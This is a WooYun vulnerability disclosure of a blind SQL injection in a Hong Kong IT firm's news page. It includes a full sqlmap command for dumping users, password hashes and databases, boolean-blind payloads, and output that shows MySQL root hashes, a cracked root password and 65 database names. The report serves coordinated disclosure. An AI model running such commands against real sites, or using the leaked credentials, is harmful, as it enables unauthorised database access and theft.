当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0151216

漏洞标题:大同信息科技有限公司某處存在SQL插入攻擊(DBA權限/root密碼泄露/65個庫)(香港地區)

相关厂商:大同信息科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-02 13:46

修复时间:2015-12-19 16:38

公开时间:2015-12-19 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-02: 细节已通知厂商并且等待厂商处理中
2015-11-04: 厂商已经确认,细节仅向厂商公开
2015-11-14: 细节向核心白帽子及相关领域专家公开
2015-11-24: 细节向普通白帽子公开
2015-12-04: 细节向实习白帽子公开
2015-12-19: 细节向公众公开

简要描述:

大同信息科技有限公司是一家专注于提供资讯科技服务的高科技公司,公司总部位于香港,在东莞拥有一家全资子公司──同升计算机技术有限公司,在广州、珠海、上海、无锡等城市设有四个办事处,服务范围遍及香港、华东和华南。
本公司拥有一支优秀的系统集成、软体发展和实施团队,下设信息管理事业部和信息技术事业部。业务范围包括系统整合、基础设施解决方案和管理、软体及网站开发、企业资源管理和客户关系管理系统的谘询和实施、网络技术培训、小型机维护、伺服器及网络设备销售等服务。作为专业的资讯科技服务供应商,我们与微软、思科、甲骨文、联想等在行业中技术一流的公司紧密合作,竭诚为中港两地的客户提供最优质的信息化服务。
本公司集合多年的信息化服务经验,总结出一套独特的实践流程和服务标准,配合客户的实际需求,能够在短时间内帮助客户在信息化的建设和管理上推向更高的台阶。我们秉承「以人为本、务实进取」的精神,致力提供迅速和优质的服务,帮助客户达到经营目标!

详细说明:

地址:http://**.**.**.**/gb/news_show.php?id=216&tid=

python sqlmap.py -u "http://**.**.**.**/gb/news_show.php?id=216&tid=" -p id --technique=B --random-agent --current-user --is-dba --users --passwords --dbs

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=216 AND 2421=2421&tid=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=216 AND 2421=2421&tid=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5
database management system users [2]:
[*] 'gallery2'@'localhost'
[*] 'root'@'localhost'
database management system users password hashes:
[*] gallery2 [1]:
password hash: *BD8B10B0DC38871B1B451B66C620E24A0E95EBB3
[*] root [1]:
password hash: *00A51F3F48415C7D4E8908980D443C29C69B60C9
clear-text password: 12345
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=216 AND 2421=2421&tid=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5
available databases [65]:
[*] `donghua-ml`
[*] boxing
[*] cac
[*] cits
[*] cmel_new_bak_20110718
[*] cml_com_cn
[*] cms_karmay
[*] cosmel_backup_on_0720
[*] cosmel_database_coverstring_to_utf8_20110718
[*] cosmel_new
[*] cosmel_new_0903
[*] cosmel_new_bak_0903
[*] cosmel_restore2
[*] cosmos_elink
[*] cosmos_nc_com
[*] cosmos_plastics_com
[*] cw_cits
[*] cw_cm2011
[*] cw_joyue
[*] cw_karmay
[*] cw_rockman
[*] dekuma_welltec
[*] dg_cosmos
[*] dgcosmos_com
[*] gallery2
[*] gallery2bak
[*] imovie
[*] information_schema
[*] isowers
[*] iwine
[*] joyue
[*] karmay
[*] karmay_com_cn
[*] kingtutor
[*] melco_new
[*] miaopu
[*] mysql
[*] nso
[*] nut_cits
[*] nut_cits0211
[*] nut_cits100303
[*] nut_cits1006
[*] nut_greatwall
[*] nut_greatwall_2
[*] nut_karmay
[*] nut_melco_100723
[*] nut_melco_100723one
[*] nut_melco_100723one_20150409
[*] nut_plastic
[*] roadjob
[*] root_tmpdb
[*] sen_research
[*] shukong
[*] sowers
[*] tang
[*] test
[*] test_base
[*] test_base34
[*] test_cosmel
[*] test_donghua_ml
[*] test_karmay_com_cn
[*] web4staff_mysql
[*] welltec_com_hk
[*] wp
[*] wuxi

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-11-04 16:36

厂商回复:

已將事件通知有關機構

最新状态:

暂无